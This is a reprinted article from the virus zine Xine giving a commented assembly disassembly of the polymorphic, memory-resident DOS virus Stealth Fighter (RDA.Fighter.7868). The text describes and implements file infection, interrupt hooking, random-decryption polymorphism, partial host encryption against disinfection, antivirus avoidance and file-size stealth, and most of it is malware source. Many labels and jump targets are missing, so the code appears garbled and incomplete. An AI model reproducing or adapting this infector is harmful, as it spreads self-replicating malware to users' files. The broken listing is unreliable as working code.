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Xine - issue #5 - Phile 216

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 · 4 May 2024


| Xine - issue #5 - Phile 216 |

comment *
Virusname: Stealth Fighter, DEMO Part 3.2
Other names: RDA.Fighter.7868
Type: Poly TSR COM/EXE Semistealth
Disasm: Darkman and b0z0

General description:
This is a quite old but interesting DOS virus, one of the first ones using
the RDA, random decryption algorithm, idea. With RDA the decryption method
(so both keys and mathematical operations) will not be stored in the
decryptor. Indeed the RDA algorithm will try to decrypt the encrypted body
with all the possible implemented methods until the right one will be
choosen, this is when the virus body will become plaintext. To decide if
the virus body was sucesfully decrypted the virus will compare the stored
CRC, calculated at decryptor generator, with the one calculated on the
computed data. To make AV disinfection even harder the virus will encrypt
a small random part of the original host and decrypt it in memory just
before executing it.
The virus includes also an ECC, error correcting code, algorithm that is
a piece of code that can find, and in some cases also correct, modifications
to the body of the virus. This is of course an interesting feature to prevent
in memory patching/debugging of the code. The ECC routine will be executed
before and after each file infection.
The virus includes also a very primitive interrupt tunneling routine and
has semistealth features (stealth on FCB/DTA findnext, correctly avoiding
problems with CHKDSK).

Poly and RDA:
The virus has an interesting and quite big polymorphic engine. It can
generate up to 8 layers of decryption. It can generate quite a lot of different
garbage and encryption types. It is interesting that in the first part of the
decryptor generation the virus will generate garbage instructions that will
actually set up the registers to some useful value for the real decryption
stage (like the key value). So there aren't any real obvious initialization
steps of in the decryptor. To encrypt the virus body (and other encryption
layers) the poly will just execute the generated decryptor in memory, to
get the same results from the garbage instructions, and then fix the memory
changing instructions to the inverse ones. There are quite some garbage
instruction that can be generated, with many int calls and also ax/al only
opcodes. Browse the i_table table in the source for a complete list.
The RDA decryptor generator (this layer is not included in the 8 layers count
of the previous part) is created on a fixed structure basis. A generic model
(starting from rda_basic_body label) will be filled with garbage instructions,
taking care of not modifying the used registers. To accomplish this the RDA
uses a pretty big step description table, that tells how many bytes have to
be copied from the generic model and then which registers can garbage mess up
and which not.

Well, enough word, here comes the fully commented code. Many longer
explanations have been included in the code at the most interesting parts,
so we won't spend any more words in this short introduction :)

.model tiny
org 100h

call delta_offset
pop si ; Load SI from stack (delta offset)

cld ; Clear direction flag
sub si,offset delta_offset

sub ax,ax ; Zero AX
mov ds,ax ; DS = segment of interrupt table

cmp word ptr ds:[(31h*04h+01h)],'FS'
jne move_virus ; Not equal? Jump to move_virus
cmp byte ptr ds:[(31h*04h+02h+01h)],20h
jae virus_exit ; Above or equal? Jump to virus_exit

mov cs:[runtim_patch],(runtim_patch-runtim_patch)
mov word ptr ds:[(31h*04h+01h)],'FS'
mov byte ptr ds:[(31h*04h+02h+01h)],20h

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

push es ; Save ES at stack
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)

lea di,[si+data_] ; DI = offset of data_
mov cx,(data_end-data_begin)
rep stosb ; Zero data_

lea di,[bp+data__] ; DI = offset of data__
mov cx,(data_end_-data_begin_)
rep stosb ; Zero data__
pop es ; Load ES from stack

add si,offset code_begin
lea ax,resize_mem ; AX = offset of resize_mem
push es ax ; Save registers at stack
mov di,100h ; DI = offset of beginning of code
mov ax,di ; AX = " " " " "
mov cx,(code_end-virus_begin)/02h
cld ; Clear direction flag
rep movsw ; Move the virus below Program Seg...

retf ; Return far
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

cmp [si+encrypt_stat],00h
je vir_com_exit ; Host not encrypted? Jump to vir_...

mov di,[si+crypt_ptr] ; DI = file pointer to encrypted/d...
sub di,[si+header_size_]
add di,100h ; DI = offset of encrypted data
call decrypt_host
cmp word ptr [si+offset need_segovv],01h
jne vir_exe_exit ; EXE executable? Jump to vir_exe_...

mov di,100h ; DI = offset of beginning of code
push es di ; Save registers at stack
lea si,[si+file_header] ; SI = offset of file_header
cld ; Clear direction flag
movsw ; Move the original code to beginning
movsb ; " " " " " "

jmp virus_exit_
cli ; Clear interrupt-enable flag
mov ax,es ; AX = segment of PSP for current ...

add ax,word ptr [si+file_header+0eh]
add ax,10h ; AX = initial SS relative to star...
mov ss,ax ; SS = " " " " "

mov sp,word ptr [si+file_header+10h]
sti ; Set interrupt-enable flag

mov ax,es ; AX = segment of PSP for current ...
add ax,10h ; AX = segment of beginning of EXE...
add ax,word ptr [si+file_header+16h]
push ax ; Save initial CS relative to star...
push word ptr [si+file_header+14h]

push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
xor ax,ax ; Zero AX
xor bx,bx ; Zero BX

retf ; Return

db '"RandomDecodingAlgorithmEngine 1.1"'
rda_checkvalue dw 00h ; contains the value calculated by
; rda to see if the body was correctly
; decrypted
file_header db 11001101b,00100000b
db 11101000b ; CALL imm16 (opcode 0e8h)
db 17h dup(?) ; File header
crypt_ptr dw ? ; File pointer to encrypted/decryp...
crypt_key db ? ; Encryption/decryption key
crypt_length dw ? ; Length of encrypted/decrypted data
header_size dw ? ; Header size
encrypt_stat db 00h ; Status of host encryption
header_size_ dw ? ; Header size
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov [first_data],00h
mov [second_data],01h
mov [cache_stat],00h ; Examine if disk is cached

mov bx,(data_end__-code_begin+0fh)/10h+11h
mov ah,4ah ; Resize memory block
int 21h

runtim_patch equ byte ptr $+01h ; Offset of runtime patch
jmp get_set_int
mov [runtim_patch],(get_set_int-call_rda_fun)

mov ax,0eeeeh ; RDA.7868 function
int 21h
mov bx,21h ; BX = interrupt vector 21h
push bx ; Save BX at stack
call get_int_addr
mov word ptr [int21_addr],bx
mov word ptr [int21_addr+02h],es

call tunnel_int13
call tunnel_int21

lea dx,int21_virus ; DX = offset of int21_virus
pop bx ; Load BX from stack
call set_int_addr

mov bx,08h ; BX = interrupt vector 08h
push bx ; Save BX at stack
call get_int_addr
mov word ptr [int08_addr],bx
mov word ptr [int08_addr+02h],es
lea dx,int08_virus ; DX = offset of int08_virus
pop bx ; Load BX from stack
call set_int_addr

call rnd_init_seed

push cs ; Save CS at stack
pop es ; Load ES from stack (CS)

lea bx,ds_ ; BX = offset of ds_
mov [bx+(ds__-ds_)],ds ; Store data segment
mov ds,ds:[2ch] ; DS = segment of environment segment
xor si,si ; Zero SI
lodsw ; AX = two bytes of environment va...

dec si ; SI = offset within environment v...
cmp ax,00h ; End of environment variables?

jne find_zero ; Not equal? Jump to find_zero

add si,03h ; SI = offset of filename
mov dx,si ; DX = " " "

cli ; Clear interrupt-enable flag
mov ax,cs ; AX = code segment
mov ss,ax ; SS = stack segment

lea sp,stack_ptr ; SP = offset of stack_ptr
sti ; Set interrupt-enable flag

mov ax,4b00h ; Load and execute program
int 21h

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

jc virus_exit__ ; Error? Jump to virus_exit__

mov ax,4d00h ; Get return code (normal)
int 21h
push ax ; Save AX at stack
mov es,ds:[2ch] ; ES = segment of environment segment
mov ah,49h ; Free memory
int 21h

mov ax,ds ; AX = segment of PSP for current ...
dec ax ; AX = segment of current Memory C...
mov es,ax ; ES = segment of Memory Control B...
mov word ptr es:[01h],08h

push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
pop ax

mov ah,4ch ; Terminate with return code
int 21h
; this is the body of the rda algorithm. some part will be added and modified
; at runtime tho.
call rda_delta_offset_calc

rda_first_dw_0 dw 00h
rda_second_dw_0 dw 00h ; will contain length
rda_third_dw_0 dw 00h ; will contain initial key
rda_fourth_dw_0 dw 00h ; steps for rda_calculate_value_in_dx

rda_first_db_0 db 00h ; first execution mark if 0ffh, used
; to reinit rng from time to time
db 90h ; padding

rda_modulusv dw 10h
rda_modulusv2 dw 00h

rda_sp_storage dw 00h

off_to_table_2 dw 00h ; will contain the offset to the part
; of the table_2 used
enc_dec_byte db 00h ; 0 encrypting, 1 decrypting. used
; to reference the right rda_to_part_2
; table segment

db 90h

rnd_seed_1 dw 00h ; values for the rng
rnd_seed_2 dw 00h

db 8Fh
db 76h

db 4 * 4 dup (00h)

db 10h * 4 dup (00h)

out 70h, al ; send command to rtc passed in al
jmp short $+2
in al, 71h ; read response

db 0E8h ; call opcode

push ax bx cx dx
push ds
mov ax, 0FFFFh
mov ds, ax
mov al, ds:0Eh
pop ds
cmp al, 0FCh ; AT?
jz get_data_with_rtc ; If the computer is an AT
; get system time through
; ports, otherwise get system
; time through interrupts

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (get_data_with_dos-get_data_with_rtc)
mov ax, 0 ; get seconds
call rtc_comm_routine
mov cl, al
mov ax, 2 ; get minutes
call rtc_comm_routine
mov ch, al
mov ax, 4 ; get hours (12 hours mode)
call rtc_comm_routine
mov dl, al
mov ax, 6 ; get day of week
call rtc_comm_routine
mov dh, al

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (store_datetime-get_data_with_dos)
mov ah, 2Ch

add [si+offset rnd_seed_1], cx
add [si+offset rnd_seed_2], dx
pop dx cx bx ax

db 0E8h ; call opcode

cmp ax, 0 ; is limit 0? if so go away
jnz continue_rngwm

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (rvwm_ret-continue_rngwm)
push bx cx dx
push ax
call random_generator
pop ax
xchg ax, dx
mov bx, dx
xor dx, dx
inc bx ; and just limit it with our
cmp bx, 0 ; desired value
jz no_need_to_div
div bx
xchg ax, dx
pop dx cx bx

db 0E8h ; call opcode

mov ax, [si+offset rnd_seed_1]
mov bx, [si+offset rnd_seed_2]
mov cx, ax
mov dx, 8405h
mul dx
add cx, cx
add cx, cx
add cx, cx
add ch, cl
add dx, cx
mov cl, 1
data_end_ equ $+01h ; End of data__
and cl, bl
ror cl, 1
add dx, bx
add bx, bx
add bx, bx
add dx, bx
add dh, bl
add dh, cl
add ax, 1
adc dx, 0
mov [si+offset rnd_seed_1], ax
mov [si+offset rnd_seed_2], dx

db 0E8h ; call opcode

cmp byte ptr [si+offset enc_dec_byte], 0
jz rda_decryption_stage

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (rda_encryption_stage-rda_decryption_stage)
lea ax, [si+offset rda_to_part_2] ; to mom instructions
mov [si+offset off_to_table_2], ax
mov ax, [si+offset rda_first_dw_0]
mov di, [si+offset rda_first_dw_0]
mov [si+offset rda_off_todi], ax

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (rda_prepare_forencdec-rda_encryption_stage)
lea ax, [si+offset rda_to_part_2 + 20h] ; to reverse ones
mov [si+offset off_to_table_2], ax
mov ax, [si+offset rda_first_dw_0]
mov [si+offset rda_off_todi], ax

xor bx, bx
mov cx, 10h
shl bx, 1
shr ax, 1
adc bx, 0
loop rda_findbeginning

mov ax, bx
mov di, 10h
sub di, [si+offset rda_first_dw_0]

shl di, 1
mov [si+offset rda_sp_storage], sp
lea sp, [si + offset enc_dec_instr + 2] ; antidebug
mov bp, si

shr ax, 1
jb rda_gotorealencdec

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (rda_notthisevol-rda_gotorealencdec)
and di, 1Eh
mov cx, di
add di, [si+offset off_to_table_2]
push word ptr [di]
mov di, cx
push word ptr [si+offset rda_third_dw_0]
mov [si+offset restore_di_aft], di

db 0bfh ; mov di
rda_off_todi dw 00h

or di, 0FFF0h
dec di
mov cx, [si+offset rda_second_dw_0] ; lenght
shr cx, 1
lea bx, [si+offset rda_end_basic_bodycode] ; what to enc

db 0bah ; mov dx,
dw 00h ; key is placed here with
; the second push
enc_dec_instr dw 00h ; the real instruction is
; placed here via a push
add dx,[bp+di+offset rda_end_basic_bodycode]
dec di
or di,0ff80h
dec di

inc bx
inc bx
loop rda_mathloopz

db 0bfh ; mov di,
restore_di_aft dw 00h
add sp,4 ; stack again on right pos

inc di
inc di
or ax, ax
jz rda_end_loop_sel

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (rda_loop_selection-rda_end_loop_sel)
push ax
push ax
mov word ptr [si+offset restore_di_aft], 0
mov word ptr [si+offset rda_off_todi], 0
mov sp, [si+offset rda_sp_storage]

; will calculate if the body was correctly decrypted returning in dx the calc
; value
mov cx, [si+offset rda_fourth_dw_0]
shr cx, 1
lea di, [si+offset rtc_comm_routine]
mov dx, 20h
mov bp, 695Fh
mov ax, 4653h

add ax, [di]
mov bl, al
and bx, 0Fh
add ax, [bx+di]
xor bp, [bx+di]
mov bl, ah
or bx, 0FFF0h
sub ax, [bx+di]

db 0 ; an instruction from the rda_table_part_1 will
db 0 ; be placed here (the second two bytes)
db 0 ; and here the first two bytes of the same entry of
db 0 ; before

inc di
inc di
loop rda_calcloop1

add dx, bp
mov word ptr [si+offset rda_init_storage_1], 0
mov word ptr [si+offset rda_init_storage_2], 0
ret ; reset the ops and ret

db 0E8h ; call opcode

pop si ; usual delta offset calculation
sub si, offset rda_delta_off_sub
push cs
pop ds

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (rda_goentry_run-rda_reencrypt_and_redo)
mov byte ptr [si+offset enc_dec_byte], 1 ; reencrypt
call rda_encdec_routine

inc byte ptr [si+offset rda_first_db_0]
jnz rda_norandom_reinit
call rda_get_datetime

mov ax, [si+offset rda_modulusv]
call random_value_with_modulus
mov [si+offset rda_first_dw_0], ax
mov byte ptr [si+offset enc_dec_byte], 0 ; decrypt
call rda_encdec_routine
mov ax, [si+offset rda_modulusv2]
call random_value_with_modulus
mov bx, ax ; select one pair from the
shl bx, 1 ; table 1, replace and try
shl bx, 1 ;to calculate
lea di, [bx+si+offset rda_to_part_1]
mov ax, [di]
mov [si+offset rda_init_storage_1], ax
mov ax, [di+2]
mov [si+offset rda_init_storage_2], ax
call rda_calculate_value_in_dx
lea di, [si+offset rda_end_basic_bodycode]

add di,offset rda_checkvalue-100h
cmp cs:[di], dx ; decrypted succeully?
jz rda_end_basic_bodycode

db 11101001b ; JMP imm16 (opcode 0e9h)
dw (rda_reencrypt_and_redo-rda_end_basic_bodycode)
rda_end_basic_bodycode: ; ok, so it's decrypted ok
nop ; and we can proceed

xchg bx, bx
xchg bx, bx ; variable number of do nothing
xchg bx, bx ; ops to change offset of the
xchg bx, bx ; stored calc value will be
xchg bx, bx ; stored. in virus body just to
xchg bx, bx ; pad the lenght to 10h boundary
nop ; for ECC use
; rda basic body end.

int08_virus proc near ; Interrupt 08h of RDA.7868
int08_patch equ $ ; Offset of interrupt 08h patching
cmp cs:[int08_stat],00h ; Restore interrupt 21h?
jnz int08_exit_ ; Not zero? Jump to int08_exit_

push ax es ds ; Save registers from stack
xor ax,ax ; Zero AX
mov ds,ax ; DS = segment of interrupt table
cmp word ptr ds:[(21h*04h++02h)],800h
ja int08_exit ; Above? Jump to int08_exit

mov cs:[int08_stat],01h ; Don't restore interrupt 21h

les ax,ds:[(21h*04h)] ; ES:AX = address of interrupt 21h
mov word ptr cs:[int21_addr],ax
mov word ptr cs:[int21_addr+02h],es
mov word ptr cs:[int21_addr_],ax
mov word ptr cs:[int21_addr_+02h],es

mov word ptr ds:[(21h*04h)],offset int21_virus
mov ds:[(21h*04h++02h)],cs

mov word ptr ds:[(31h*04h+01h)],'FS'
mov byte ptr ds:[(31h*04h+02h+01h)],20h

call rnd_init_seed
pop ds es ax ; Load registers from stack
inc cs:[int08_count] ; Increase interrupt 08h counter
test cs:[int08_count],00000001b
jnz int08_exit__ ; Not zero? Jump to int08_exit__

push ax ; Save AX at stack
mov al,20h ; AL = interrupt request/in-servic...
out 20h,al ; Store initialization command wor...
pop ax ; Load AX from stack

iret ; Interrupt return
jmp cs:[int08_addr]

int24_virus proc near ; Interrupt 24h of RDA.7868
mov al,03h ; Fail system call in progress

iret ; Interrupt return

int13_call proc near ; Call to address of interrupt 13h
pushf ; Save flags at stack
call cs:[int13_addr]

ret ; Return
pop ax ; Load AX from stack

push bx es ; Save registers at stack
push ax ; Save AX at stack
mov ah,2fh ; Get Disk Transfer Area (DTA) add...
call int21_call
pop ax ; Load AX from stack

call int21_call
cmp al,0ffh ; Not successful?
je fcb_ste_exit ; Equal? Jump to fcb_ste_exit

push ax ; Save AX at stack
cmp byte ptr es:[bx],0ffh
jne not_extended ; Not extended FCB? Jump to not_ex...

add bx,07h ; BX = offset of normal FCB
mov ax,es:[bx+17h] ; AX = file time
call tst_infected
pop ax ; Load AX from stack
jnc fcb_ste_exit ; Not infected? Jump to fcb_ste_exit

mov cs:[filenam_addr],bx
inc cs:[filenam_addr] ; Store address of filename
mov cs:[dta_fcb_stat],01h

add bx,1dh ; BX = offset of filesize
call size_stealth
pop es bx ; Load registers from stack

iret ; Interrupt return
pop ax ; Load AX from stack

push bx es ; Save registers at stack
push ax ; Save AX at stack
mov ah,2fh ; Get Disk Transfer Area (DTA) add...
call int21_call
pop ax ; Load AX from stack

call int21_call
jc dta_st_exit ; Error? Jump to dta_st_exit

push ax ; Save AX at stack
mov ax,es:[bx+16h] ; AX = file time
call tst_infected
pop ax ; Load AX from stack
jnc dta_ste_exit ; Not infected? Jump to dta_ste_exit

mov cs:[filenam_addr],bx
add cs:[filenam_addr],1eh
mov cs:[dta_fcb_stat],00h

add bx,1ah ; BX = offset of filesize
call size_stealth
pop es bx ; Load registers from stack

clc ; Clear carry flag

retf 02h ; Return far and add option-pop-va...
pop es bx ; Load registers from stack

stc ; Set carry flag

retf 02h ; Return far and add option-pop-va...

int21_virus proc near ; Interrupt 21h of RDA.7868
int21_patch equ $ ; Offset of interrupt 21h patching
push ax ; Save AX at stack
inc ah ; Increase function number
cmp ax,0efeeh ; RDA.7868 function?
jne exam_terminat ; Not equal? Jump to exam_terminat

call patch_ints
pop ax ; Load AX from stack

iret ; Interrupt return
cmp ax,4c00h ; Terminate with return code (no...)?
je infect_file ; Equal? Jump to infect_file
cmp ah,3eh ; Close file?
je infect_file ; Equal? Jump to infect_file
cmp ah,57h ; Get or set file's date and time?
je infect_file ; Equal? Jump to infect_file
cmp ah,4fh ; Find next matching file (DTA)?
je dta_stealth ; Equal? Jump to dta_stealth
cmp ah,50h ; Set PSP address?
jne exam_find_ne ; Not equal? Jump to exam_find_ne
jmp dta_stealth_
cmp ah,12h ; Find next matching file (FCB)?
je fcb_stealth ; Equal? Jump to fcb_stealth
cmp ah,13h ; Delete file (FCB)?
jne exam_get_ret ; Not equal? Jump to exam_get_ret
cmp cs:[chkdsk_stat],01h
je exam_get_ret ; Equal? Jump to exam_get_ret

jmp fcb_stealth_
cmp ah,4dh ; Get return code?
jne int21_exit_ ; Not equal? Jump to int21_exit_

mov cs:[chkdsk_stat],00h

push ds dx ; Save registers at stack
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov ax,20h ; Random number within thirty-two
call get_random_limit
or ax,ax ; Write string to standard output?
jnz int21_exit ; Not zero? Jump to int21_exit

mov ah,09h ; Write string to standard output
lea dx,string ; DX = offset of string
call int21_call
pop dx ds ; Load registers from stack
int21_patch_ equ $ ; Offset of interrupt 21h patching
pop ax ; Load AX from stack
jmp cs:[int21_addr]

int21_call proc near ; Call to address of interrupt 21h
pushf ; Save flags at stack
call cs:[int21_addr]

ret ; Return
call ecc_prepare
mov word ptr cs:[int21_patch_],1001000011001111b
mov word ptr cs:[int21_patch_+02h],'FS'
call ecc_prepare

call examine_file
jnz int21_exit_ ; No error? Jump to int21_exit_

mov cs:[ss__],ss ; Store stack segment
mov cs:[sp__],sp ; Store stack pointer
mov ax,cs ; ax = code segment
cmp ax,cs:[ss__] ; Code segment equal to stack seg...?
je not_set_sssp ; Equal? Jump to not_set_sssp

cli ; Clear interrupt-enable flag
push cs ; Save CS at stack
pop ss ; Load SS from stack (CS)

lea sp,stack_ptr ; SP = offset of stack_ptr
sti ; Set interrupt-enable flag
push ax bx cx dx di si bp es ds
cmp cs:[cache_stat],00h ; Examine if disk is cached?
jne no_cach_exam ; Not equal? Jump to no_cach_exam

push ds dx ; Save registers at stack
call exam_cache
pop dx ds ; Load registers from stack
call restore_int

call lod_file_inf
jc infect_exit ; Error? Jump to infect_exit
mov ax,cs:[file_time] ; AX = file's time

call tst_infected
jnc read_header ; Not infected? Jump to read_header
jmp infect_exi
push ds dx ; Save registers at stack
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

call rnd_init_seed

mov ah,3fh ; Read from file
mov cx,1ah ; Read twenty-six bytes
lea dx,file_header_ ; DX = offset of file_header_
int 21h
jnc move_header ; No error? Jump to move_header

jmp infect_exit_
lea si,file_header_ ; SI = offset of file_header_
lea di,file_header ; DI = offset of file_header
mov cx,(head_end-head_begin)
cld ; Clear direction flag
rep movsb ; Move twenty-six bytes

cmp word ptr [file_header],'ZM'
je examine_exe ; Found EXE signature? Jump to exa...
cmp word ptr [file_header],'MZ'
jne examine_com ; Didn't find EXE signature? Jump ...
mov [need_segovv],00h ; EXE executable

jmp exam_filesiz
mov [need_segovv],01h ; COM executable
call set_file_eof
or dx,dx ; Filesize too small?
jnz sto_filesize ; Not zero? Jump to sto_filesize
cmp ax,1000h ; Filesize too small?
jb infect_exit_ ; Below? Jump to infect_exit_
mov word ptr [filesize],ax
mov word ptr [filesize+02h],dx

mov si,[need_segovv] ; SI = executable
shl si,01h ; Multiply executable with two
call [si+prepare_file]
jc infect_exit_ ; Error? Jump to infect_exit_
call crypt_action

push si bx ; Save registers at stack
mov bx,ax ; BX = decryptor's offset
mov si,100h ; SI = delta offset
mov cx,(code_end-virus_begin)
lea di,data_buffer ; DI = offset of data_buffer
call ppmle_gen
pop bx si ; Load registers from stack

mov ax,cs:[file_time] ; AX = file's time
and ax,1111111111100000b
or al,00000001b ; Set infection mark
mov cs:[file_time],ax ; Store file's time

push cx dx ; Save registers at stack
call [si+infect_file_]

push cs ; Save CS at stack
pop es ; Load ES from stack (CS)

call set_file_eof
pop dx cx ; Load registers from stack

mov ah,40h ; Write to file
int 21h

lea dx,filesize_ ; DX = offset of filesize_
mov cx,02h ; Write two bytes

add ax,cx ; Add two to length of decryptor +...
mov [filesize_],ax ; Store filesize_

mov ah,40h ; Write to file
int 21h
pop dx ds ; Load registers from stack
call sto_file_inf

call get_int_add_
pop ds es bp si di dx cx bx ax

cli ; Clear interrupt-enable flag
mov ss,cs:[ss__] ; SS = stack segment
mov sp,cs:[sp__] ; SP = stack pointer
sti ; Set interrupt-enable flag

jmp int21_exit_

set_file_eof proc near ; Set current file position (EOF)
mov ax,4202h ; " " " " "

set_file_pos proc near ; Set current file position
xor cx,cx ; CX:DX = offset from origin of ne...
xor dx,dx ; " " " " " " "
int 21h

ret ; Return

patch_ints proc near ; Patch interrupt 08h and 21h
cli ; Clear interrupt-enable flag
mov byte ptr cs:[int21_patch],11101001b
mov word ptr cs:[int21_patch+01h],(int21_exit__-int21_patch-03h)
mov byte ptr cs:[int08_patch],11101001b
mov word ptr cs:[int08_patch+01h],(int08_exit__-int08_patch-03h)

ret ; Return

crypt_action proc near ; Read plain data, encrypt it, wri...
push ax ; Save AX at stack
mov [encrypt_stat],00h ; Host not encrypted

cmp [need_segovv],01h ; COM executable?
je crypt_com ; Equal? Jump to crypt_com

mov ax,word ptr [file_header+08h]
mov cl,04h ; Multiply with paragraphs
shl ax,cl ; Header size
mov [header_size_],ax ; Store header size
mov [header_size ],ax ; " " "

mov cx,word ptr [file_header+06h]
jcxz no_relocatio ; No relocations? Jump to no_reloc...

push cx ; Save CX at stack
mov dx,word ptr [file_header+18h]
xor cx,cx ; CX:DX = offset from origin of ne...
mov ax,4200h ; Set current file position (SOF)
int 21h

mov cx,04h ; Read four bytes
lea dx,reloca_entry ; DX = offset of reloca_entry
mov ah,3fh ; Read from file
int 21h
pop cx ; Load CX from stack
jnc calc_relocat ; No error? Jump to calc_relocat

jmp crypt_exit
mov ax,word ptr [reloca_entry+02h]
cmp ax,1000h ; No need to calculate the offset...?
jnb no_calc_relo ; Not below? Jump to dont_mul_rel

shl ax,01h ; Multiply high-order word of reloc...
shl ax,01h ; " " " " "
shl ax,01h ; " " " " "
shl ax,01h ; " " " " "
add ax,word ptr [reloca_entry]
jc no_calc_relo ; Carry? Jump to no_calc_relo
add ax,[header_size_] ; Add headersize to offset of firs...
jc no_calc_relo ; Carry? Jump to no_calc_relo

jmp sub_head_siz
cmp word ptr [filesize+02h],00h
je no_relocati ; Equal? Jump to no_relocati
mov ax,0ffffh ; Set offset of first relocation e...

jmp sub_head_siz
mov [header_size_],00h ; Set header size to zero
mov [header_size],1ah ; Set header size to twenty-six
mov ax,word ptr [filesize]
sub ax,[header_size] ; Subtract header size from addres...
jbe crypt_exit ; Below or equal? Jump to crypt_exit

mov cx,ax ; CX = offset of first relocation ...
cmp ax,57cfh ; Offset of first relocation entr...?
jb rnd_in_range ; Below? Jump to rnd_in_range

mov ax, 57cfh ; Random number within twenty-two ...
call get_random_limit
cmp ax,00h ; Zero?
je crypt_exit ; Equal? Jump to crypt_exit
mov [crypt_length],ax ; Store length of encrypted/decryp...

sub cx,ax ; Subtract random number within ra...
xchg ax,cx ; AX = offset within first relocat...
call get_random_limit
add ax,[header_size] ; Add header size to random number...
mov [crypt_ptr],ax ; Store file pointer to encrypted/...

mov ax,0feh ; Random number within two hundred...
call get_random_limit
inc ax ; Increase 8-bit random number
mov [crypt_key],al ; Store encryption/decryption key

mov ah,3fh ; Read from file
call disk_action
jc crypt_exit ; Error? Jump to crypt_error

mov di,dx ; DI = offset of data_buffer
call encrypt_host

mov ah,40h ; Write to file
call disk_action
jc crypt_exit ; Error? Jump to crypt_error

mov [encrypt_stat],01h ; Host encrypted
pop ax ; Load AX from stack

ret ; Return

disk_action proc near ; Read/write encrypted data
push ax ; Save AX at stack
mov ax,4200h ; Set current file position (SOF)
xor cx,cx ; CX:DX = offset from origin of ne...
mov dx,[crypt_ptr] ; DX = file pointer to encrypted/d...
int 21h
pop ax ; Load AX from stack

mov cx,[crypt_length] ; CX = length of encrypted/decrypt...
lea dx,data_buffer ; DX = offset of data_buffer
int 21h

ret ; Return

encrypt_host proc near ; Partial decrypt the infected file
mov al,[crypt_key] ; AL = encryption/decryption key
mov cx,[crypt_length] ; CX = length of encrypted/decrypt...
mov ah,[di] ; AH = byte of infected file
xor [di],al ; Encrypt byte of infected file

add al,ah ; Add byte of infected file to enc...
add al,cl ; Add low-order byte of length of ...

inc di ; Increase index register

loop encrypt_loop

ret ; Return

decrypt_host proc near ; Partial decrypt the infected file
mov al,[si+crypt_key] ; AL = encryption/decryption key
mov cx,[si+crypt_length]
xor es:[di],al ; Decrypt byte of infected file

add al,es:[di] ; Add byte of infected file to dec...
add al,cl ; Add low-order byte of length of ...

inc di ; Increase index register

loop decrypt_loop

ret ; Return

examine_file proc near ; Examine filename and file extension
push ax si ; Save registers at stack
mov si,dx ; SI = offset of filename
cld ; Clear direction flag
lodsb ; AL = byte of filename
and al,al ; End of filename?
jz tst_nam_exi ; Zero? Jump to tst_nam_exi
cmp al,'.' ; Dot?
jne find_dot ; Not equal? Jump to find_dot

mov ax,[si-04h] ; AX = two bytes of filename
and ax,1101111111011111b
cmp ax,'SE' ; Aidstest?
je tst_nam_exi ; Equal? Jump to tst_nam_exi
cmp ax,'NA' ; COMMAND.COM?
je tst_nam_exi ; Equal? Jump to tst_nam_exi

cmp ax,'SD' ; CHKDSK.EXE?
jne tst_file_ext ; Not equal? Jump to tst_file_ext

mov cs:[chkdsk_stat],01h
lodsw ; AX = two bytes of file extension
and ax,1101111111011111b
cmp ax,'OC' ; COM executable?
jne test_exe ; Not equal? Jump to test_exe

lodsb ; AL = byte of file extension
and al,11011111b ; Upcase character
cmp al,'M' ; COM executable?

jmp tst_nam_exit
cmp ax,'XE' ; EXE executable?
jne tst_nam_exit ; Not equal? Jump to tst_nam_exit

lodsb ; AL = byte of file extension
and al,11011111b ; Upcase character
cmp al,'E' ; EXE executable?
pop si ax ; Load registers from stack

ret ; Return
inc al ; Clear zero flag

jmp tst_nam_exit

tst_infected proc near ; Test if a file is infected
and al,00011111b ; AL = seconds of file time
cmp al,00000001b ; Infected (2 seconds)?

stc ; Set carry flag

je is_infected ; Equal? Jump to is_infected

clc ; Clear carry flag
ret ; Return

size_stealth proc near ; Filesize stealth
push ax ; Save AX at stack
push bx cx dx ds si ; Save registers at stack
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov bx,[filenam_addr] ; BX = offset of filename
xor si,si ; Zero SI
mov cx,(08h/02h) ; Store eight bytes
mov ax,es:[bx+si] ; AX = two bytes of filename
mov word ptr [si+filename],ax

inc si ; SI = offset within filename
inc si ; SI = " " "

loop sto_nam_loop

cmp [dta_fcb_stat],00h ; DTA stealth?
je sto_file_ext ; Equal? Jump to sto_file_ext

mov byte ptr [si+filename],'.'
inc si ; SI = offset of file extension

dec bx ; BX = " " " "
mov cx,(04h/02h) ; Store four bytes
mov ax,es:[bx+si] ; AX = two bytes of file extension
mov word ptr [si+filename],ax

inc si ; SI = offset within file extension
inc si ; SI = " " " "

loop sto_ext_loop

mov byte ptr cs:[filename+0ch],00h

mov [filesize_],00h ; Zero filesize_
lea dx,filename ; DX = offset of filename
call examine_file
jnz sub_filesize ; No error? Jump to sub_filesize

mov ax,3d00h ; Open file (read)
call int21_call
jc sub_filesize ; Error? Jump to sub_filesize
xchg ax,bx ; BX = file handle

xor cx,cx ; CX:DX = offset from origin of ne...
mov dx,cx ; " " " " " " "
mov ax,4202h ; Set current file position (EOF)
call int21_call

xchg dx,cx ; CX:DX = offset from origin of ne...
xchg ax,dx ; " " " " " " "
dec dx ; " " " " " " "
dec dx ; " " " " " " "
mov ax,4200h ; Set current file position (SOF)
call int21_call

mov cx,02h ; Read two bytes
lea dx,filesize_ ; DX = offset of filesize_
mov ah,3fh ; Read from file
call int21_call

mov ah,3eh ; Close file
call int21_call
pop si ds dx cx bx ; Load registers from stack

mov ax,cs:[filesize_] ; AX = filesize_

sub es:[bx],ax ; Subtract size of virus from file...
sbb word ptr es:[bx+02h],00h
jnb size_st_exit ; No error? Jump to size_st_exit

